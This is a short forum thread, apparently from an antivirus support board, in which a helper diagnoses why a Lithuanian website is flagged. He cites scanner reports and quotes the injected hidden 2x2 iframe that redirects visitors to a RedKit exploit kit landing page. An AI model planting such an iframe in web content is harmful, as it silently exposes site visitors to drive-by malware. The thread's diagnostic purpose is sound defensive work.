Author Topic: Not a virus warning (Read 1879 times)

kurybingas · « **on:** May 31, 2013, 09:16:15 AM »

Hallo,

Yesterday Avast begun to alarm opening my site www.kurybingi.lt , programmer did not found any viruses in database, i checked my computer as well, no viruses. No software updates, no hacking or something like that was made, we have no idea, why Avast alarms, programmer said, it can be Avast fault - "seeing" old site software as a virus

Can somebody help us? What is that? Thank you.

polonus · « **Reply #1 on:** May 31, 2013, 09:36:21 AM »

Site has known javascript malware: http://sitecheck.sucuri.net/results/www.kurybingi.lt/ a.o. in news.php -> http://www.securiteam.com/securitynews/5WP3A1P9QA.html (info provided by Janek Vind "waraxe")
redirected site given here: http://winhelp2002.mvps.org/hosts.txt -> http://sucuri.net/malware/malware-entry-mwjs612
See: http://urlquery.net/report.php?id=2750476 -> EXPLOIT-KIT Redkit exploit kit redirection attempt

polonus

polonus · « **Reply #2 on:** May 31, 2013, 03:55:06 PM »

For the malicious iFrame redrect to RedKit landing site:
Writes

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=
htXp://cellfx.com/hahf.html?j=966678></iframe>
(repeated 2 times)

see theiFrame redirect? here -> http://wepawet.iseclab.org/view.php?hash=dc271698224e2cdc0bb41c8fb4133f8f&t=1369985122&type=js
IDS for Redkit Landing site -> http://urlquery.net/report.php?id=2747351

polonus

P.S. Get a 404 for the Frame src -> http://jsunpack.jeek.org/?report=852546cd0886da8b4c39210b5b9859bfdcfdcc9a

Damian

Author Topic: Not a virus warning (Read 1879 times)

kurybingas

Not a virus warning

polonus

Re: Not a virus warning

polonus

Re: Not a virus warning